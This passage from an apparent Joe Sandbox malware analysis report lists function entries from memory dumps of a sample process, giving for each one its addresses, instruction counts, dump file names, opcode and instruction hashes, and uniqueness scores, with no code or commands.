                  • Opcode Fuzzy Hash: 48ed2e8facc846a1ced54679e7a3b104a46dfb35b74a473bc492c5b61a8407bc
                  • Instruction Fuzzy Hash: D2E15871D1AA5A9FEB98EB68C4947B8B7B1FF59340F0441BAD00DD32C2DB386881CB55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F13D25 Relevance: .3, Instructions: 338COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 24efbdb1d26aff1084250c416340aca2e328702249ed3c9746c91872c2d9d6ad
                  • Instruction ID: 3a03333e0a36163021d32ec0cd0ac37b07306d81ceeae6d0bd57fbd99d681e91
                  • Opcode Fuzzy Hash: 24efbdb1d26aff1084250c416340aca2e328702249ed3c9746c91872c2d9d6ad
                  • Instruction Fuzzy Hash: C1D1A470D18A2D8EEBA4EB58C8557ECBBB1FB58351F5041BAD04DE3291DB386E858F04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F016B8 Relevance: .3, Instructions: 287COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2d6a1d82e890ca2a104cc6930d698816144d80d318513a87d1a685ef833581fe
                  • Instruction ID: 0ba3e6ccfb8aa36900a1eb2ad83d1eb34367bce900a0592e712a5e32882b8e7b
                  • Opcode Fuzzy Hash: 2d6a1d82e890ca2a104cc6930d698816144d80d318513a87d1a685ef833581fe
                  • Instruction Fuzzy Hash: 1681AC31A0CA8A8FDB58EF1C98515A977E2FF9A744F14457EE44DC32C2DE24AC428785
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F01C9D Relevance: .2, Instructions: 193COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 238cf4edabb8bf010e4d1279bb1438d6aa8f04a2ec09504b2eb0e8fecc2771d9
                  • Instruction ID: f389931879a2fcd55ea4dd1031341e66b30010d63ead073073973b589a0d5c1c
                  • Opcode Fuzzy Hash: 238cf4edabb8bf010e4d1279bb1438d6aa8f04a2ec09504b2eb0e8fecc2771d9
                  • Instruction Fuzzy Hash: 0051BD31A0CA898FDB48EF1888645AA77E2FB99344F14457ED44AC32C2DF34E8428785
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F1541D Relevance: .2, Instructions: 180COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fcf1a92c33e9bed6d32c4939be5d9e8b3ee79a13ffd3fbb142fde89876e0625b
                  • Instruction ID: 6abacef544ca88d304a2aee4f5ab86ceef7a5579ed5e64d389959b3475c35dcf
                  • Opcode Fuzzy Hash: fcf1a92c33e9bed6d32c4939be5d9e8b3ee79a13ffd3fbb142fde89876e0625b
                  • Instruction Fuzzy Hash: 12512871D1895D8FEB94EBA8D8996BDB7F1FF68351F40007AD00DE3296DB34A8818B44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F030F5 Relevance: .2, Instructions: 165COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c3f37a22a819c0f9edca83dc1279e71563e9b104117b9640cf84314f8f8407d1
                  • Instruction ID: e23b16b9cf930211cdc961c9c7b4d7a57500c0acbd5e3ab0db1cb57adb3d2866
                  • Opcode Fuzzy Hash: c3f37a22a819c0f9edca83dc1279e71563e9b104117b9640cf84314f8f8407d1
                  • Instruction Fuzzy Hash: 43511670D0D61D8EEB54EBA8D4947EDBBB1FF59341F50007AD009E7291EB38A944CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F13BFB Relevance: .1, Instructions: 147COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1fb718d9e1a0284cea660bd3f04824e3b90134842bf1a06247b82d1b98dfcc7b
                  • Instruction ID: b5c08df13f1b4a45891316a5c08db068d22806d4231763a60aa89e913d0ad576
                  • Opcode Fuzzy Hash: 1fb718d9e1a0284cea660bd3f04824e3b90134842bf1a06247b82d1b98dfcc7b
                  • Instruction Fuzzy Hash: 0E412936B0D6969EE701B72DA8591EA7FE0FFD1372F0404B7D288CB093DA285848C365
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F020B5 Relevance: .1, Instructions: 141COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c428fc099e05f6641ecb2394cb16b6a5270bb46f691eee6eb000e2525aeb2895
                  • Instruction ID: 432f7bbb36b7f14e459cb3e51faac75e91665d47408754268e9b9cfea9884ccb
                  • Opcode Fuzzy Hash: c428fc099e05f6641ecb2394cb16b6a5270bb46f691eee6eb000e2525aeb2895
                  • Instruction Fuzzy Hash: 0E415B31A0D64A5FE356EB7894451B9BBE1EF8A391F0540BBD44DC31D2EF28A8418365
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F0353B Relevance: .1, Instructions: 136COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4c96dda044d32f91d6d4b6d49d352f014ec16489a3fa8021e371d0d34e367109
                  • Instruction ID: 16d910a6122a74ed762906ca9a7b6d2aaa47042df9693a0632f95ccaac3e6d5c
                  • Opcode Fuzzy Hash: 4c96dda044d32f91d6d4b6d49d352f014ec16489a3fa8021e371d0d34e367109
                  • Instruction Fuzzy Hash: 03418C31E1D84A9FEB85EB6CD4556BDBBE0FF5A380F4400BAD00AD72D2EF2868018715
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F0AF78 Relevance: .1, Instructions: 104COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f0a000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3ff73f89c57477f1a809390664f4b6289e91be63e3cbf51dc33c4c54d86512c8
                  • Instruction ID: fb4d896b84b036e23838a7596e83c4dfaf7a0ff80ed858ebf6a6acc582dee218
                  • Opcode Fuzzy Hash: 3ff73f89c57477f1a809390664f4b6289e91be63e3cbf51dc33c4c54d86512c8
                  • Instruction Fuzzy Hash: DB31CE31D1E6868FE711EB7888191E97BE0FF16385F0804BAC469D71D3EF28A9488359
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F12BB2 Relevance: .1, Instructions: 101COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cb776d9b000ca1fde7ae2319455f9d135e4a6fd5e8a95eeb075ac5830253e677
                  • Instruction ID: 4679fb639edf49d7ed15037032c4af4e2122f2d8e66c4f962be99e514f797571
                  • Opcode Fuzzy Hash: cb776d9b000ca1fde7ae2319455f9d135e4a6fd5e8a95eeb075ac5830253e677
                  • Instruction Fuzzy Hash: 3531B770D0991D8FDB94EFA8C895BACB7B1FB59340F5041AAC40DE3291EF3469848F44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F1561D Relevance: .1, Instructions: 81COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: be659445aeb20dfc3ec74f80537b07dc1d248a95f7dd11ee4b6e505a051fcefd
                  • Instruction ID: f4fb2340260b5936b51c9d6bb447529afe8b33ab7ce273e3dc97af2612572db2
                  • Opcode Fuzzy Hash: be659445aeb20dfc3ec74f80537b07dc1d248a95f7dd11ee4b6e505a051fcefd
                  • Instruction Fuzzy Hash: 9021B33084C68E8FDB85EF24C858ABA7FF0FF29301F0400AAE459C7192DB34A551C740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F1280F Relevance: .1, Instructions: 73COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1e52bd8dd86d629c0cd926fa9d580108b866e0d4dc79605a0489b1eeb92b273b
                  • Instruction ID: 3fab15b9ae9defd5c34a0f014c2fdf73f9287403b9f40d9fb3d8137eaf94d9b5
                  • Opcode Fuzzy Hash: 1e52bd8dd86d629c0cd926fa9d580108b866e0d4dc79605a0489b1eeb92b273b
                  • Instruction Fuzzy Hash: 4921903084E7CA5FD747ABB488282A57FB0EF17315F1940EBD449CA0E3DB295845C325
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F03304 Relevance: .1, Instructions: 71COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6b5f2e7e59c2b11794be2db1c2a09b70e9e44a94f9226db141ed615373a490a
                  • Instruction ID: fb75a15422e88f2e3430bfffdee151e84ab1dbcd4e50949d278cd4f8f9c10535
                  • Opcode Fuzzy Hash: a6b5f2e7e59c2b11794be2db1c2a09b70e9e44a94f9226db141ed615373a490a
                  • Instruction Fuzzy Hash: 75218C3084D7CA8FE743EB7888585A97FF0FF1B340F0944EAD449CB0A2EA289545C721
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F15536 Relevance: .1, Instructions: 70COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 51b652085644826fc084f568e9ca26c5956a3f3680a0c14d0ccbb5ddc55a105f
                  • Instruction ID: 2e56ee65aa087fef0571cb6553a9c621e2cd33a06e2bf46dff4f08aafb6eba51
                  • Opcode Fuzzy Hash: 51b652085644826fc084f568e9ca26c5956a3f3680a0c14d0ccbb5ddc55a105f
                  • Instruction Fuzzy Hash: E111D371E189198FEBA4EB68D8457ACB7B2FB58344F5040AAD00DE3286DF386D858B44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F16E61 Relevance: .1, Instructions: 69COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3d3a2daf501c7a91d57e708ceb04d2e0b6fb5f16f4375ce6ff39fde7d2f6dfc8
                  • Instruction ID: 36a3326a481772268fbaa575451ae06897e1ade1ea064e269ef3b35ce4986a61
                  • Opcode Fuzzy Hash: 3d3a2daf501c7a91d57e708ceb04d2e0b6fb5f16f4375ce6ff39fde7d2f6dfc8
                  • Instruction Fuzzy Hash: F2117F3080D64E9FEB99EF28C4592B97BE1FF68341F1406BAD409C71D2DB38A944C785
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F00A01 Relevance: .1, Instructions: 69COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 377773c914b8877ea9ea1c382783776fb6a663cdf7559ad3fb5c73dce8774289
                  • Instruction ID: 230c59e09e75ae5ef1ab052d6d7d108391c5cf597e37bc43f79638f405dd190d
                  • Opcode Fuzzy Hash: 377773c914b8877ea9ea1c382783776fb6a663cdf7559ad3fb5c73dce8774289
                  • Instruction Fuzzy Hash: DD115830D0D54E9EE791FB68C8496BA7BA0FF9A385F4005B6D809D61D2EF38A5448744
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F148F5 Relevance: .1, Instructions: 68COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8471218185759e7d4e67109f8a88529ce85834429fcd714bd027026e95d788b1
                  • Instruction ID: eabd3bc3179d92daece2cfb3272b4989380f26e3627133ced2ebd4e2066f96ea
                  • Opcode Fuzzy Hash: 8471218185759e7d4e67109f8a88529ce85834429fcd714bd027026e95d788b1
                  • Instruction Fuzzy Hash: B711AC70C0D68E9FEB89EF2884592B97BA1FFA9341F4401BAD409D71D2DB38A940CB45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F16F05 Relevance: .1, Instructions: 67COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 44e63215d38d1b2f6452c90808f5e873642249fdaa7b5a38aaf2fe65d43e0b76
                  • Instruction ID: 38303e81122c56be3f1d456cf7faf6a257d5ccd7a9f68f9144692ec84e53fb85
                  • Opcode Fuzzy Hash: 44e63215d38d1b2f6452c90808f5e873642249fdaa7b5a38aaf2fe65d43e0b76
                  • Instruction Fuzzy Hash: D311BE30C1C64E9FEB88EF2884592B97BA0FF68341F0041BAD40DC35D2EB38A844C740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F12611 Relevance: .1, Instructions: 65COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 09455a22f8d26a8c1021ae278bdc10cbdd6d229a05c4e8459903066fecfa98f8
                  • Instruction ID: 8e8ab970cd9f4c41ff8155b6b85dac4b1e5a291672bba4669277a747a2895628
                  • Opcode Fuzzy Hash: 09455a22f8d26a8c1021ae278bdc10cbdd6d229a05c4e8459903066fecfa98f8
                  • Instruction Fuzzy Hash: FA118B7091C6498FDB48EF98C4A95E97BE1FF58345F05027EE80AD32C1EB34A850CB84
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F14E15 Relevance: .1, Instructions: 65COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a684f58b0b402e647f85429ec2e92b5b3aadc4198cf1ff4c1e47518ac23d23de
                  • Instruction ID: ab94771c17f46da976c6c3b5f389e87de202cd3cceb21f44f461052229c524c4
                  • Opcode Fuzzy Hash: a684f58b0b402e647f85429ec2e92b5b3aadc4198cf1ff4c1e47518ac23d23de
                  • Instruction Fuzzy Hash: CF11E331D0DA8A8FEB89EF6484A92B87BA1FFA5344F0504BED00DC65D2DB296880C705
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F16FA5 Relevance: .1, Instructions: 64COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 72ad77ad1a94753fee99aaa6082a1aa94c16e6ae062692ab7f233f57849964b4
                  • Instruction ID: 3267356702111882162f671b625ab80fa830b531f7dc881859e9d14281adc6df
                  • Opcode Fuzzy Hash: 72ad77ad1a94753fee99aaa6082a1aa94c16e6ae062692ab7f233f57849964b4
                  • Instruction Fuzzy Hash: 5711E331C0DA899FEB59EF2488662B97BE0FF15300F0504BED40DC25D2DF29A854C705
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F0372F Relevance: .1, Instructions: 64COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98bce1d99e45a80cf7aaf244851123b609021f83eb7c2c0f7b5d98dc72b1e2d8
                  • Instruction ID: 66cb08279dce61e07d97f8f9464bd048e027817b34ea2ac2a14747481ae0cefe
                  • Opcode Fuzzy Hash: 98bce1d99e45a80cf7aaf244851123b609021f83eb7c2c0f7b5d98dc72b1e2d8
                  • Instruction Fuzzy Hash: F8117630A0D90A8FE758DF28E8283AA7AF1EB95225F90007EC00AD36D6CFF914558B54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F14859 Relevance: .1, Instructions: 62COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1d1ef843752aa6855b094485fa2209c480418a067164d143c3c6a407afc72a14
                  • Instruction ID: 35c538fee2581f406a14325893cb290d73279a612a704075fef6ba5262f4ddce
                  • Opcode Fuzzy Hash: 1d1ef843752aa6855b094485fa2209c480418a067164d143c3c6a407afc72a14
                  • Instruction Fuzzy Hash: 7921A23080D68E9FDB89EF6884692B97BA1FFA9351F1405BBD409C71D2DB38A844C751
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F15189 Relevance: .1, Instructions: 62COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f869cac196288b477561beb43cdc4d4142fc2ee2870d046c410ac82b5ce0ab8c
                  • Instruction ID: 8c10826599b50d5553e1bd5e1fbc914484cee9d22b4f2bc79abc81231b516044
                  • Opcode Fuzzy Hash: f869cac196288b477561beb43cdc4d4142fc2ee2870d046c410ac82b5ce0ab8c
                  • Instruction Fuzzy Hash: 1311903090D68E9FEB4AEB2484592B9BBF0FF19341F0504BBD409D61D2EB39A944C711
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F0121D Relevance: .1, Instructions: 62COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 882649facb88f8ccb85c35a612de87cd733f3cff81cbbbab3e8c4f16f22ff317
                  • Instruction ID: 5d0f2c0543676acdc4905c5e006d0db92300cfedb852f24e8cf6d77f1cfa05f2
                  • Opcode Fuzzy Hash: 882649facb88f8ccb85c35a612de87cd733f3cff81cbbbab3e8c4f16f22ff317
                  • Instruction Fuzzy Hash: F4119D30D0D54A8EEB99EF6884A92B97BE0FF5A341F4405BED40AC71D2FF35A4848710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F03491 Relevance: .1, Instructions: 60COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f00000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 58a764beb954ab36e066d7ee7e8158ec0ac39b5381d826e03d622aea69cd3800
                  • Instruction ID: b953bafa997528ddd23a8d7cce3c84f6afffc4c268648808d6e8c4774165e611
                  • Opcode Fuzzy Hash: 58a764beb954ab36e066d7ee7e8158ec0ac39b5381d826e03d622aea69cd3800
                  • Instruction Fuzzy Hash: 77115E3490C68E8FDB46EB6884592B9BBA0FF1A341F4405BED419CA1D1EB35A554C704
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F17581 Relevance: .1, Instructions: 59COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 68450fc6425a3d67652e3eab5e178340306e116f6dec13b1d1e2f432fe52627f
                  • Instruction ID: 97872d0897b7247890d6131434568b7073e31dffb4bdf533bc6fbae427a6f5dc
                  • Opcode Fuzzy Hash: 68450fc6425a3d67652e3eab5e178340306e116f6dec13b1d1e2f432fe52627f
                  • Instruction Fuzzy Hash: B3115B3190C95A9FE751FB74C8486BABBE4FF19381F0409B6E41DC7095EB38A9808B54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F14F3D Relevance: .1, Instructions: 58COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5a02f60c3694cd37b8f25e3bea1dd1eca930e8d836207ad7648507ad1042dd2d
                  • Instruction ID: eb46d8fda40891c4657b01d0518286dd7d39482924047012b343d2d8e2ac69e8
                  • Opcode Fuzzy Hash: 5a02f60c3694cd37b8f25e3bea1dd1eca930e8d836207ad7648507ad1042dd2d
                  • Instruction Fuzzy Hash: 8711BF3081D68E9FEB49EF6484592BE7BA1FF69301F0404BAD409C72D2DB39A840C711
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F0AC15 Relevance: .1, Instructions: 57COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f0a000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c93ae01c977c71076a6028562091710b1f102c9b754bd83f71be531b6226bc55
                  • Instruction ID: c7db8cd2a8b18e02ecce7784fb6c9701b1dd7f88903bf9f926baae44b14a5655
                  • Opcode Fuzzy Hash: c93ae01c977c71076a6028562091710b1f102c9b754bd83f71be531b6226bc55
                  • Instruction Fuzzy Hash: E911D636A0D3464FD312EB2DE4D45D93BF1EF86361B0A45F3C148CF0A3EA2894898365
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F0BDE5 Relevance: .1, Instructions: 57COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f0a000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a2171b78cd28fafb8226c32631cf5f35872e49eb7d0088b6ff056a4a154a7ae0
                  • Instruction ID: 88c6ab96e1bd73cf6811af40e998ec7bdcf7bfd284df3eaa45a8ba7d20fd6234
                  • Opcode Fuzzy Hash: a2171b78cd28fafb8226c32631cf5f35872e49eb7d0088b6ff056a4a154a7ae0
                  • Instruction Fuzzy Hash: DE116D3091D64E8FEB89EF24C8592BD7BE0FF19301F4505BAD41AC61D2EB35A550CB04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF848F12A01 Relevance: .1, Instructions: 56COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000025.00000002.2217236850.00007FF848F11000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F11000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_37_2_7ff848f11000_AFKwztugVSPq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: daa44787d4ebc77f9cc43de2a14a78124b4de10f4784ed1b0efc1be8993bcc1c
